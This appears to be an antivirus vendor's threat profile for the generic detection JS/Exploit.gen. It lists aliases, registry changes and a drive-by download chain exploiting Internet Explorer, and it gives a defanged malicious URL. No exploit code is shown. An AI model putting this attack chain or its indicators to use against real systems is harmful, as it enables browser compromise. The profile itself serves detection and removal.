For Home

Virus Profile: JS/Exploit.gen

Threat Search
Print
   
Virus Profile information details
Risk Assessment: Home Low | Corporate Low
Date Discovered: 2/2/2009
Date Added: 2/2/2009
Origin: N/A
Length: varies
Type: Trojan
Subtype: Generic
DAT Required: 5514
Removal Instructions
   
 
 
   

Description

JS/Exploit Generic is detection for suspiciously encoded JavaScript.  Scripts containing certain attributes used to maliciously exploit a browser or other web content rendering mechanisms are detected under this classification name.

JS/Exploit is not a virus, but rather an exploit that takes advantage of security vulnerability in some versions of Microsoft Internet Explorer, Outlook and Outlook Express.

Indication of Infection

The presence of download files resulting from the script execution.

This vulnerability modifies the browsers start page, search page and also add some unauthorized links to the "Favorites" folder of Microsoft Internet Explorer.

Typically this exploit is used to execute other programs.  Those programs can be whatever the author chooses to run on the vulnerable system.  Therefore it is not possible to provide specific information as one attack can vary from the next. 

Methods of Infection

Browsing an infected website containing this script.

This threat could be delivered via an email message, or an infectious web page.

   

Virus Characteristics

------ Updated on June 4, 2012 ------

Aliases

  • Ikarus         - JS.Redirector
  • Kaspersky  - HEUR:Trojan.Script.Iframer
  • Avast          - JS:Redirector-VI [Trj]
  • Microsoft    - Trojan:JS/Kasura.A

JS/Exploit.gen is detection for suspiciously encoded JavaScript. Scripts containing certain attributes used to maliciously exploit the browser.

Upon execution, it opens the internet explorer (Iexplorer.exe) and displays the below pages

And the following registry keys has been added

  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_STISVC\0000\Control
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_STISVC\0000\Control
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Colors
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar0
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar1
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar2
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar3
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar4
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Summary
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Settings
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012012061120120612

The following registry values has been added

  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_STISVC\0000\Control\ActiveService: "stisvc"
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_STISVC\0000\Control\ActiveService: "stisvc"
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\WindowPlacement: 2C 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 13 01 00 00 9A 01 00 00
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\ShowThumbnail: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\BMPWidth: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\BMPHeight: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\ThumbXPos: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\ThumbYPos: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\ThumbWidth: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\ThumbHeight: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\UnitSetting: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\NoStretching: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\SnapToGrid: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\View\GridExtent: 0x00000001
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\ShowTextTool: 0x00000001
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\PointSize: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\PositionX: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\PositionY: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\Bold: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\Underline: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\Italic: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\VerticalEdit: 0xFFFFFFFF
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\TextPen: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\TypeFaceName: ""
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Text\CharSet: 0x00000000
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Summary\Bars: 0x00000005
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Summary\ScreenCX: 0x00000552
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Summary\ScreenCY: 0x00000266
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar4\BarID: 0x0000E818
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar4\XPos: 0xFFFFFFFE
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar4\YPos: 0xFFFFFFFE
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\General-Bar4\Docking: 0x00000001

The following registry values has been modified to the system

  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent\: 0x00000009
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent\: 0x0000000A
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x00000009
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurrent\: 0x0000000A
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Directory = "%windir%\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\
    Directory = "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath: "%windir%\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath: "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath: "%windir%\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath: "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath: "%windir%\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath: "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath: "%windir%\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath: "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
  • HKEY_USER\S-1-[varies]\Software\Microsoft\Internet Explorer\Main\Window_Placement: 2C 00 00 00 02 00 00 00 03 00 00 00 00 83 FF FF 00 83 FF FF FF FF FF FF FF FF FF FF 16 00 00 00 1D 00 00 00 6E 02 00 00 B1 01 00 00
  • HKEY_USER\S-1-5-[varies]\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 80 7E 39 29 A0 31 C6 01 01 00 00 00 C0 A8 C7 96 00 00 00 00 00 00 00 00

------ Updated on Dec-06-2011 -----

Aliases –
    • Norman - HTML/Redir.JG
    • Sophos - Troj/PhpShl-G
    • Symantec - Trojan.Webkit!html

"Js/Exploit.gen"

is a generic detection for HTML files containing malicious code to redirect users to malicious Web servers.

Also the "Js/Exploit.gen" contains the encrypted JAVA Script code that use vulnerability in some version of Microsoft Internet Explorer to execute. Once the vulnerabilities are exploited, then the binary files are downloaded from the following malicious URL.

hxxp://sukablya[removed].com/main.php?page=43842ba0d45a9da3

-----

This is a generic detection.  Specific payloads, urls, or IP address may very for specific samples.

Js/Exploit.gen contains the encrypted JAVA Script codes that use vulnerability in some version of Microsoft Internet Explorer to execute. Once the vulnerabilities are exploited, then the binary files are downloaded from the malicious URL. After that the downloaded files are saved in Temp folder %temp%. Finally the files are executed.

   
All Users:
Use current engine and DAT files for detection. Delete any file which contains this detection.